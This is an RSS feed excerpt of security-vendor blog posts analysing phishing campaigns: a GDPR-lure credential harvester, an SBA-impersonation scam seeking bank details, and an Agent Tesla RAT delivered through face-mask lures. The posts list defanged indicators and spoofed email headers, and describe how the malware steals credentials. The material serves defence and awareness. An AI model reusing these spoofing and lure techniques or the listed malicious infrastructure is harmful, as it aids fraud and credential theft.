acd368c99c7071461701bec70dcd113ad028fbbb</p><p>SHA256: 08c3d787f8a45044c85e4c95fb935cbab569d48a16dbe511b8abf6b79fa08046</p><p>SSdeep: 3072:V4PrXcuQuvpzm4bkiaMQgAlSmrvsPhQVwjZVPg:iDRv1m4bnQgISevsPOVwjZ5g</p><p><b>Attachment File Names:</b></p><p>Report.doc</p><p>Resume.doc</p><p>LG-7231 Medical report Covid-19.doc</p><p>IQ-5125 Medical report Covid-19.doc</p><p><b>PowerShell Executables (file names are a fixed-length, consisting of seven alphanumeric characters):</b></p><p>Qncqa3a.exe</p><p>S1xi8fyw.exe</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">2Bfo8Irb7k6uQ0BGPzn97p</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Are you GDPR-compliant? New phishing message harvests credentials with GDPR lure]]></title>
            <link>https://blog.cloudflare.com/gdpr-compliance-for-phishing/</link>
            <pubDate>Wed, 23 Sep 2020 10:57:00 GMT</pubDate>
            <description><![CDATA[ Credential harvesting phishing emails leverage GDPR compliance and exploits cloud-based services, Virtual Private Servers, to target sales executives. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in September 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>A new campaign is attempting to harvest credentials from several businesses across industry verticals using the European Union’s General Data Protection Regulation (GDPR) compliance as a lure. This phishing message, first caught by Area 1 Security on August 31st, leverages misconceptions regarding <a href="https://gdpr.eu/compliance/">GDPR compliance</a> in an effort to steal email login credentials from unsuspecting targets.</p><p>The phish uses a classic tactic of creating a false sense of urgency to fool recipients into complying with the request. The attacker lures targets under the pretense that their email security is not GDPR-compliant and requires immediate action. For many who are not versed in GDPR regulations, this phish could be merely taken as more red tape to contend with rather than being identified as a malicious message.</p><p>As shown below, the attacker makes use of graphics and clever formatting to give the message a more credible, authoritative appearance. To maintain the illusion that the email originated from a legitimate source, the sender email address is spoofed to appear as an automated message from the security department of the targeted company. In order to stay relevant, the attacker also regularly updates to comply - or “Action required” - date included in the body of the message.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jQRzCRvQWcSvRurLPVSL1/f7d580cdafa6b368846f36a8d24c2636/image3-6.png" />
            
            </figure><p>Based on Area 1 Security’s analysis, this campaign is predominantly launched at public-facing emails of the targeted companies, e.g. @.com. However, to a lesser extent, there are instances when individuals are targeted, typically executives and upper management. These individuals often work in the sales department, demonstrating the attacker is purposefully choosing targets who are likely to have access to client data and need to comply with GDPR regulations.</p><p>In the initial wave of the campaign, the attacker sent phishing messages from a Virtual Private Server (VPS) IP address belonging to ReadyIDC, 103[.]22[.]183[.]95. Using a VPS allows the attacker a greater degree of anonymity when conducting phishing campaigns since it is extremely difficult to pinpoint their physical location. They are able to leverage all the benefits of using a cloud-based service, as well as the ability to easily spin up new servers in the event that their IP address gets blocked or otherwise identified as phishing infrastructure.</p><p>A careful inspection of the headers in one of the first instances of this phish reveals a misstep by the threat actor when launching their campaign. As detailed below, despite successfully spoofing the visible FROM header, the envelope MAIL FROM address divulges that the attacker sent their malicious messages via a Gmail account.</p>
            <pre><code>MAIL FROM:&lt;redacted&gt;@gmail.com&gt;
From: noreplysecurityservices@&lt;targeted company’s domain&gt;
To: &lt;public-facing targeted company’s email account&gt;
Subject: User account security alert
Date: 31 Aug 2020 22:17:43 +0700</code></pre>
            <p>This mistake is quickly rectified in subsequent phishing messages, where the attacker successfully spoofs not only the visible From address but also the envelope MAIL FROM domain of the targeted companies. However, these “stealthier” messages expose yet another blunder, as evidenced by the presence of a “Disposition-Notification-To” header.  This header indicates that read-receipts are enabled, meaning the attacker will be notified when a target opens the malicious email.  This once again discloses the sender account, which happens to be the same Gmail address as identified in the first wave of the campaign.</p><p>On the second day of the campaign (September 1st) the attacker began inserting SMTP HELO commands to tell receiving email servers that the phishing message originated from the target company’s domain, when in fact it came from an entirely different origin. This is a common tactic used by malicious actors to spoof legitimate domains and easily bypass legacy email security solutions. Shown in the following headers, the true origin of the email is the IP address 196[.]53[.]250[.]243:</p>
            <pre><code>smtp.pra=noreplysecurityservices@&lt;targeted company’s domain&gt;; spf=None
smtp.mailfrom=noreplysecurityservices@&lt;targeted company’s domain&gt;; spf=None
smtp.helo=postmaster@&lt;targeted company’s domain&gt;
Received: from unknown (HELO &lt;targeted company’s domain&gt;) ([196[.]53[.]250[.]243])
  by &lt;redacted&gt;.com with ESMTP; 01 Sep 2020 05:19:33 -0400
From: noreplysecurityservices@&lt;targeted company’s domain&gt;
To: &lt;email of employee at targeted company&gt;
Subject: Email User security alert
Date: 1 Sep 2020 16:19:07 +0700</code></pre>
            <p>The attacker switched to this IP address to launch the second wave of the campaign. Depicted below is a screenshot of a vulnerable and shoddy gaming site, Ran Smok, which is directly accessible via this IP (i.e., hxxp://196[.]53[.]250[.]243). The site links to various web pages that result in “Access denied,” and the IP address has been associated with numerous suspicious websites over the years. An analysis of available services running on the IP address reveals that port 25 (used by the Simple Mail Transfer Protocol, or SMTP) is running in a filtered state, and is most likely how the attacker is sending the phishing messages. A closer look at the list of open ports on the IP address reveals a number of additional services that should never be open to the internet, thus leaving the host at this IP exceedingly vulnerable, and all-the-more enticing to an attacker.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5VXVpm0mmjzWeIqtFFcNvb/bbdcee882e927bc10f2204ebb0933a4c/image1-8.png" />
            
            </figure>
    <div>
      <h3>Analysis of Link</h3>
      <a href="#analysis-of-link">
        
      </a>
    </div>
    <p>The malicious payload in this phish is a link to a credential harvester, located at hxxps://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=. The value of the “email” parameter in the URL will vary depending on the recipient, wherein the threat actor tailors each phishing message by setting this parameter equal to the target’s email address. The link opens up to a simple web page, hosted on a <a href="https://kinsta.com/blog/wordpress-security/">compromised WordPress site</a>, as shown below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Lgr0NrLe8W6kDAAqGH9us/1d8c4c054a6c983016e8f14655441b6c/image2-10.png" />
            
            </figure><p>The HTML form on the malicious webpage autopopulates the username field based on the email address found in the URL’s “email” parameter. After clicking “Next,” the page will prompt the user to enter a password. Based on Area 1 Security’s analysis, the page appears to return an error regardless of whether the victim enters a correct password. Stolen credentials are then sent to the attacker via a script located at, hxxps://www[.]techgaia[.]com//wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin[.]php.</p><p>Area 1 Security’s analysis revealed that www[.]techgaia[.]com is the older, now-defunct site for a revamped IT consulting services company. The site was running an outdated version of WordPress (version 4.9.7), making it susceptible to a number of <a href="https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-257818/Wordpress-Wordpress-4.9.7.html">vulnerabilities</a>. Its content has since been removed, and navigating to the domain now results in an HTTP 301 redirect. The vulnerable nature of this site made it easy prey, providing the perfect opportunity for an attacker to insert themselves into the fray and leverage the historic legitimacy of the site to bypass detections. With the ease of compromising unmaintained, vulnerable WordPress sites, it will only take the attacker a matter of days (at most) to resume operations with a new, otherwise legitimate site. As a result, legacy vendors that rely on deny lists to block suspect messages will be one step behind the attacker.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>For companies that deal with sensitive customer data, it is important to be knowledgeable in the latest data security and privacy regulations for the respective industry and region. New data privacy laws, such as the California Consumer Protection Act, are requiring businesses to ensure that consumers residing in California are able to opt out of data collection. All the while, GDPR currently remains the most stringent regulation in consumer data privacy. It is vital to communicate with all employees any updates regarding new protocols for handling Personally Identifiable Information (PII) to help ensure those in your organization do not fall victim to phishing attacks that rely on confusion from unclear or nonexistent communication regarding these regulations.</p><p>Additionally, it is imperative that employees understand the risks of clicking on unsolicited links and entering sensitive data into unauthorized login portals. However, current technology allows an attacker to easily create a phish that is a pixel-perfect forgery of a legitimate login page. Therefore, the safer, more secure option is to utilize a <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">dedicated security solution</a>; one that uses bleeding-edge technology to verify emails before they arrive in a user’s inbox, removing the risk of accidentally clicking a malicious link or file.</p><p>Area 1 Security’s advanced detection techniques, such as blind URL inspection, help stop phishing messages like those seen in this GDPR campaign from reaching customers’ inboxes. Our comprehensive <a href="https://www.cloudflare.com/zero-trust/products/email-security/">anti-phishing solution</a> includes sophisticated pattern-matching algorithms that allow us to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Credential Harvesters:</b></p><p><a>https://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=</a></p><p><a href="https://www\[.\]techgaia\[.\]com//wp-content/email/ID/sign\_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin\[.\]php">https://www\[.\]techgaia\[.\]com//wp-content/email/ID/sign\_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin\[.\]php</a></p><p><b>Sender IP Addresses:</b></p><p>196[.]53[.]250[.]243</p><p>103[.]22.183[.]95</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">3MMiLOjbAPhwxF7VVoaQ14</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Latest SBA phishing attempt: stealthy social engineering phish using newly registered domains attempts to gain bank details]]></title>
            <link>https://blog.cloudflare.com/sba-phishing-attempt/</link>
            <pubDate>Wed, 09 Sep 2020 11:17:00 GMT</pubDate>
            <description><![CDATA[ Area 1 blocks social engineering, COVID-19 phishing emails impersonating Small Business Administration, using Newly Registered Domains, PDF attachments. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in September 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Congress may be in a deadlock over a second stimulus package, but malicious actors are always ready to pounce on the slightest opportunity to exploit the public’s confusion. The US Small Business Administration (SBA) is being impersonated in Coronavirus-themed phishing messages that leverage unfamiliarity with loan application procedures. With many small businesses relying on loans from the SBA to keep their doors open during the quarantine slump, cyber criminals are capitalizing on delays in loan approvals to swindle businesses.</p><p>Since at least April, malicious actors have been impersonating the SBA in <a href="https://www.sba.gov/blog/be-alert-about-email-phishing-scams-bad-actors-seeking-take-advantage-through-sba-loan-application">various campaigns</a> leveraging diverse Tactics, Techniques and Procedures (TTPs), such as malicious payloads, credential harvesters, and stealthy social engineering, all aimed at severely compromising devices and stealing money from companies. In our “How to Stop Financial Phishing Attacks” webinar earlier this year (available on-demand <a href="https://gateway.on24.com/wcc/eh/2153307/lp/3952832/beyond-email-gateways-email-authentication-how-to-stop-financial-phishing-attacks">here</a>), we covered one such campaign, which attempted to spread <a href="https://securityboulevard.com/2020/04/guloader-the-rat-downloader/">GuLoader malware</a>.</p>
    <div>
      <h3>A Simple Yet Effective Approach</h3>
      <a href="#a-simple-yet-effective-approach">
        
      </a>
    </div>
    <p>The latest wave of attacks involves a clever social engineering tactic that can fly under almost any radar. This phishing message does not contain errant red flags that would maladroitly trigger a litany of detections. Unlike the previously observed campaigns, this wave of attacks does not contain any malicious payloads, only a benign attachment named <b>SBA - Disaster Loan Assistance Form.pdf</b>. The attacker opts for a clever and silent attack vector, relying on the target believing the email is indeed from the SBA.</p><p>Looking at the email below, it is clear this is not your typical <a href="https://www.fbi.gov/scams-and-safety/common-scams-and-crimes/nigerian-letter-or-419-fraud">419 phishing scam</a>, poorly masquerading as an official entity to solicit money. The attacker ensures that even the smallest of details are correct in order to give the message a more credible appearance:</p><ul><li><p>First, the Sender email address looks entirely legitimate.</p></li><li><p>Second, the target’s full name appears in the body of the message, as opposed to just a mere email address, as is often seen in more low-level attacks.</p></li><li><p>Lastly, the message is free of typos and the formatting is clean and professional.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5SL2Wqk58XJjYMH4dOxO9D/ad3b9dbec1e6a989a8b3941cca4cce28/image5-7.png" />
            
            </figure><p>The attacker successfully spoofs the FROM headers of the real SBA Disaster Customer Service account, as seen on the left. Unfortunately, replying to this email will not send your Economic Injury Disaster Loan (EIDL) application to the SBA, but instead to the attacker’s account at the malicious Reply-To domain, as shown on the right.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2fb5YRj623UslHx7ROThhJ/49ee74f3ebdecb3a4fb621f4ccd6e64a/image4-7.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7qqNmvS5ehJRWaP7oy1Uv5/e0c9551b4d553adda0a5ae43c2c60b44/image6-5.png" />
            
            </figure><p>Just days before launching this campaign, the attacker created the malicious Reply-To domain gov-sba[.]us using bogus registration information. Whois details for this newly registered domain (NRD) are shown below.</p>
            <pre><code>Domain Name: gov-sba[.]us
Registry Domain ID: D18007599F1554B3DAA9B6AFEA0F4235C-NSR
Registrar WHOIS Server:
Registrar URL: www.psi-usa.info
Updated Date: 2020-08-05T06:22:13Z
Creation Date: 2020-07-31T06:22:09Z
Registry Expiry Date: 2021-07-31T06:22:09Z
Registrar: PSI-USA, Inc. dba Domain Robot
Registrar IANA ID: 151
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C186298DF566447488A165F7E4F5B8F60-NSR
Registrant Name: Krikor Derabrahamian
Registrant Organization:
Registrant Street: Rotenloewengasse 15
Registrant City: Wien
Registrant State/Province: US
Registrant Postal Code: 1090
Registrant Country: US
Registrant Phone: +44.7418440320
Registrant Email: office@teamtours.at
Registrant Application Purpose: P5
Registrant Nexus Category: C31/US
Registry Admin ID: C5DF36C6EB720453A8CB08A1FC96AB740-NSR
Admin Name: Krikor Derabrahamian
Admin Organization:
Admin Street: Rotenloewengasse 15
Admin City: Wien
Admin State/Province: AT
Admin Postal Code: 1090
Admin Country: AT
Admin Phone: +44.7418440320
Admin Email: office@teamtours.at
Admin Application Purpose: P5
Admin Nexus Category: C31/AT
Registry Tech ID: C5651DB7CEC1B420BAE1B3F7BE7E214B0-NSR
Tech Name: Gerald Auer
Tech Organization: World4You Internet Services GmbH
Tech Street: Hafenstrasse 47-51
Tech City: Linz
Tech State/Province: OOE
Tech Postal Code: 4020
Tech Country: AT
Tech Phone: +43.73293035
Tech Fax: +43.7329303510
Tech Email: techadmin@world4you.com
Tech Application Purpose: P5
Tech Nexus Category: C31/AT
Name Server: ns2.world4you.at
Name Server: ns1.world4you.at
DNSSEC: unsigned</code></pre>
            <p>NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Phishing that leverages NRDs is a particularly effective tactic for a variety of reasons. For one thing, it is a common attacker technique to circumvent Secure Email Gateways (SEGs). New domains have very little history or presence, which allows them to bypass typical blocklists. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).</p><p>Attackers commonly impersonate trusted entities in order to dupe targets into letting their guard down. This is made all the easier by registering an NRD that is also a malicious look-alike domain, in this case gov-sba[.]com. As a result, the true sender domain, buried deep within an email’s headers, is often overlooked. This is particularly the case when phish are opened via mobile devices, such as cell phones, where true sender domains are often hidden, and only Display Names are provided. What’s more, it requires fairly burdensome actions to reveal this type of information in most mobile device (and other purpose-built) mail clients.</p><p>To further con targets into filling out the fraudulent EIDL application, the attacker successfully spoofed the SBA’s legitimate sender address, <a>disastercustomerservice@sba.com</a>. In a stealthy move, the attacker actually inserted an SMTP HELO command, as shown below.</p>
            <pre><code>Authentication-Results-Original: 990w8b.myvserver.online;	spf=pass (sender IP
 is 64.44.141.5) smtp.mailfrom=disastercustomerservice@sba.gov
 smtp.helo=sba.gov
Received-SPF: pass (990w8b.myvserver.online: connection is authenticated)
Reply-To: "U.S. Small Business Administration (SBA)" &lt;disastercustomerservice@gov-sba.us&gt;
From: "U.S. Small Business Administration (SBA)" &lt;disastercustomerservice@sba.gov&gt;</code></pre>
            <p>The HELO command told the receiving email server to treat the message as if it originated from SBA’s domain, when in fact the sender actually had a completely different domain and IP address, namely 990w8b[.]myvserver[.]online and 64[.]44[.]141[.]5. This resulted in various legacy email security solutions accepting the message for delivery.</p>
    <div>
      <h3>Reply with Bank Details</h3>
      <a href="#reply-with-bank-details">
        
      </a>
    </div>
    <p>A target’s reply to this phish is the lynchpin of the whole scam, given the attached EIDL application requests private financial information. Further, the likelihood of a reply is dramatically increased by the seemingly benign and unassuming nature of this purported government form. In the body of the message, the attacker provides instructions to simply reply to the email with a completed EIDL application, of course making sure to note that all personal and banking details must be correct.</p><p>Looking at the PDF below, it’s almost impossible to believe this is a forgery, especially with a valid Office of Management and Budget (OMB) form number. In fact, the PDF closely resembles the legitimate <a href="https://covid19relief.sba.gov/#/business-info">Business Information form</a> of the SBA’s online application for EIDL, and even includes an oath at the bottom certifying that all information is true under penalty of perjury. <b>With this attached PDF the attacker clearly has one goal in mind -- steal sensitive account and routing information from businesses.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7eo8OUef6V5ym63PUxdNYx/8bdeeee4de42534cb28602b93467d647/image3-7.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2KpkngTHUKOi6zAvPKiYnb/ac57eab45defeb82bd272e6b93c2843e/image1-10.png" />
            
            </figure><p>The only telltale sign that this application is a forgery can be found buried in the document properties, where no typical target would venture:</p><ul><li><p>Firstly, as seen below, this PDF was created with <a href="https://en.wikipedia.org/wiki/Skia_Graphics_Engine">Skia</a>, an open-source graphics engine for a variety of web platforms. This is a big deviation from the standard Adobe PDF Library that is used to create such documents.</p></li><li><p>Secondly, the document’s timestamp reveals that it was recently created on July 31st, 2020, long after the creation of the legitimate EIDL form.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7eR2z7fvU5PANaxamjrOyR/e93c85a8fa3e3ce15ac3f99d90854060/image2-12.png" />
            
            </figure>
    <div>
      <h3>Exposing the Imposter</h3>
      <a href="#exposing-the-imposter">
        
      </a>
    </div>
    <p>To thwart these sneaky SBA-themed phish, Area 1 Security uses multiple advanced techniques that leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts. Our anti-phishing service analyzes email for threat indicators, such as recently registered domains, <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain name</a> obfuscation, and look-a-like domains. Additionally, the service uses real-time correlation with associated brand infrastructure to verify authenticity.</p><p>Area 1 also uses lexical analysis of message body and subject to detect financially driven attacks. Headers are checked for sender display name and true sender mismatches, and SPF, DKIM, and DMARC records are checked to validate the sender. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>The <a href="https://www.sba.gov/document/report-sba-programs-scams-fraud-alerts">official SBA website</a> provides information on protecting yourself from these scams. The SBA will <i>never</i> proactively contact you for loan applications. If you receive an email asking for additional information regarding an existing loan application, first ensure there is an application number referenced in the email, and it matches your application.</p><p>If you suspect that you have received an SBA phishing email, call the Office of Inspector General Hotline at 800-767-0385 or report it online, <a href="https://www.sba.gov/about-sba/oversight-advocacy/office-inspector-general/office-inspector-general-hotline">Office of Inspector General Hotline</a>.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology leverages algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Reply-To Address:</b></p><p>disastercustomerservice@gov-sba[.]us</p><p><b>Malicious look-alike NRD:</b></p><p>gov-sba[.]us</p><p><b>Sender IP:</b></p><p>64[.]44[.]141[.]5</p><p><b>Sender Domain:</b></p><p>990w8b[.]myvserver[.]online</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1KhkezEV2OQhiM60awSjLo</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[“Face mask manufacturer” supplies Agent Tesla Malware: campaign employs Covid-19 lures and sophisticated evasion techniques]]></title>
            <link>https://blog.cloudflare.com/facemask-phishing-delivers-malware/</link>
            <pubDate>Thu, 27 Aug 2020 12:02:00 GMT</pubDate>
            <description><![CDATA[ Covid-19 phishing attack exploits need for face masks, thermometers to launch Agent Tesla malware (advanced Remote Access Trojan); bypasses gateways, DMARC. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in August 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>It’s no surprise that the world is currently facing a major shortage of the now-iconic blue surgical mask. Once only seen in hospitals and medical dramas, these masks are now the hottest selling streetwear. New state regulations now have businesses saying, “No Shirt, No Shoes, No Mask, No Service.” The incredible demand has led opportunistic businesses to get into the import/export of this vital article.</p><p>Recent phishing campaigns are also capitalizing on this trend by sending email attachments infected with <a href="https://www.aha.org/standardsguidelines/2020-06-16-hc3-sector-note-tlp-white-remote-access-trojan-agent-tesla-targets">Agent Tesla malware</a>, an advanced Remote Access Trojan (RAT), to various companies under the guise of a mask production business venture. Area 1 Security caught these attacks filled with enticing traps that bypass legacy vendors and would have otherwise made their way into users’ inboxes.</p>
    <div>
      <h3>Face Mask and Forehead Thermometer Phishing</h3>
      <a href="#face-mask-and-forehead-thermometer-phishing">
        
      </a>
    </div>
    <p>A prevalent phishing campaign loaded with a malicious executable is attempting to wreak havoc on companies worldwide, spanning numerous industry verticals. This campaign began as early as May, during the start of major lockdowns and mask shortages across the globe due to the COVID-19 pandemic. There have been numerous iterations of the campaign, but the main body of text remains the same.</p><p>The attacker lures targets by using language that preys on fears surrounding COVID-19 and claiming to offer face masks and forehead thermometers, products currently in high demand but short supply. To avoid detection, the phishing campaign generally follows a 10-day cycle wherein the threat actor slightly modifies their Tactics, Techniques, and Procedures (TTPs) before launching a new wave of emails. A recent phishing message from this campaign can be found below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bBDzRT9eirJr0ZQC3SyfZ/77c6396e6abefae34b3681415be7fafd/image4-8.png" />
            
            </figure><p>Transchem Inc. is not associated in any way with this attack</p><p>The attacker spoofs chemical manufacturers and import/export businesses to make the phishing message appear more legitimate. Area 1 Security’s research shows that the attacker continually revises their phishing messages by periodically spoofing different companies in an effort to evade detection. For the example phish above, the attacker spoofed Transchem Inc., a legitimate chemical supplier. With previously spoofed companies, the attacker included the real email address of the purported sender in the signature block; however, in this latest campaign, they remove it to reduce the chances of being detected.</p><p>To achieve the greatest success in reaching the most inboxes, the attacker uses a dynamic approach to stay one step ahead of common email security defenses:</p><ul><li><p>With each wave of the campaign, the attacker rotates to a new IP address in a likely attempt to bypass filters that only deny based on known sources of malicious activity;</p></li><li><p>Furthermore, the malware in the attachment is continually modified in order to change its hash; and</p></li><li><p>With a new hash value, the malware is effectively brand new — legacy detections that are configured to scan for known malicious hashes will not alert on this.</p></li></ul><p>Additionally, due to flaws in the implementation and configuration of email authentication protocols, such as DMARC, SPF and DKIM, the attacker is able to successfully spoof the legitimate sender domains of numerous companies. This demonstrates that the complexity and nuances involved in setting up these protocols can leave you open to attack, and, even when implemented properly, are not enough to protect you from the dynamic phishing attacks that plague companies and individuals.</p><p>After bypassing a well-known email gateway and DMARC controls, the only defense left is for the email recipient to recognize this email as a phish. However, the attacker goes to great lengths to present an authentic façade. They:</p><ul><li><p>Impersonate real employees at various companies to fool unsuspecting targets into downloading purported information on the production of face masks and forehead thermometers;</p></li><li><p>Include the legitimate logo of the spoofed company, as well as accurate mailing and contact details; and</p></li><li><p>Include the URL in the email’s signature block also leading to the legitimate website of the impersonated company.</p></li></ul><p>The attacker is clearly going the extra mile to ensure this spoof will appear as authentic as possible for unsuspecting targets.</p><p>Once the email is delivered, recipients are a mere two steps away from executing the Agent Tesla RAT. The target only needs to extract the compressed attachment, then click on the resulting “PDF”, which will launch the malware.</p><p>To further reduce suspicion, the attachment’s file name is manipulated to make it appear legitimate. More specifically, the attacker always names the attached file “Supplier-Face Mask Forehead Thermometer.pdf.gz”. The use of a double extension will often trick targets into thinking the file is a PDF, when in fact it’s a compressed executable. This ruse is made possible by the fact that many modern operating systems do not display the file extension (in this case “.gz”) for known extensions by default.</p><p>Once downloaded, victims may only see “Supplier-Face Mask Forehead Thermometer.pdf”, which is the actual file name. To make matters worse, some legacy vendors inspect an attachment’s extension <i>rather than the file properties itself</i>, thus allowing compressed executables to bypass rule filtering that is based on file extension.</p>
    <div>
      <h3>Analysis of Executable</h3>
      <a href="#analysis-of-executable">
        
      </a>
    </div>
    <p>The attachment is the focal point of this face mask-themed campaign. In order to carry out its information stealing capabilities, this infected attachment requires the target to take action by unzipping and clicking on the resulting file, “Supplier-Face Mask Forehead Thermometer.pdf.exe”. If this file is opened, the victim host will be infected with Agent Tesla, a form of Malware-As-A-Service (MaaS), which provides attackers with a dashboard and user interface (UI) to monitor the success of their campaign. Agent Tesla is an advanced RAT that functions as a keylogger and information stealer, and its primary delivery method is via attachments in phishing emails.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3kmWesi4eUB1tfkRnlamWf/639dc91ded1a88a61347aa38a9fe862b/image2-14.png" />
            
            </figure>
    <div>
      <h3>What is Agent Tesla?</h3>
      <a href="#what-is-agent-tesla">
        
      </a>
    </div>
    <p>Although Agent Tesla first surfaced in 2014, it is making a resurgence as the preferred MaaS for attackers, superseding even TrickBot and Emotet. The main advantage of Agent Tesla is its ability to adapt and change to avoid detection, providing attackers with a stealthy platform to launch attacks and bypass security measures. Various tiers are available for purchase that provide additional licenses and different functionality. However, in typical internet fashion, there is a torrent available on Russian websites.</p><p>For the initial file, the attacker uses a 32-bit Windows executable to ensure that the malware can be executed on common Windows devices. This file is a trojan, appearing as a benign application but containing hidden, malicious functionality. This initial phase determines if it is in a malware analysis environment so the program can decide whether to proceed with the attack or go to sleep.</p><p>If the malware detects it is in a target’s device, it will make a connection to the attacker’s command and control (C2) server located at us2[.]smtp[.]mailhostbox[.]com. This initial connection does not contain any information; rather, it is only an attempt to provide the attacker with confirmation that the malware successfully ran on the target device.</p><p>The malware contains functionality to read the data within a victim’s AppData folder, which contains browser credentials and credentials from email clients. The malware will attempt to load missing DLLs and download additional files in order to exfiltrate stolen information from the AppData folder. This data is sent to the C2 via SMTP as seen in packet capture below. This is a common tactic for exfiltration, given outgoing emails containing sensitive information are not likely to be marked as suspicious unless Data Loss Prevention (DLP) software is configured. The exfiltrated victim information is then available to the attacker via the Agent Tesla UI for use in future attacks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1tXyxamhlhwBBgE7RYyh3K/45a0414060ee8e06f77551c39e47f7bb/image3-8.png" />
            
            </figure><p>With each new wave of this phishing campaign, the malware is updated by using a number of advanced obfuscation techniques to avoid detection by antivirus software:</p><ul><li><p>Firstly, the attacker generates a new hash for the attached file in order to circumvent defenses that leverage databases of known malware files. This is done in part by generating executables written for the .NET framework and constantly recompiling with alternative feature sets.</p></li><li><p>Secondly, a number of anti-debugging methods are employed to halt any reverse engineering. These methods check if a debugger is present, as well as hiding threads and breakpoints from debugging tools.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7H7191Nj247N6yOpM0BVC6/9e8ef71059a9af8a9a25557afd542ad2/image1-11.png" />
            
            </figure>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
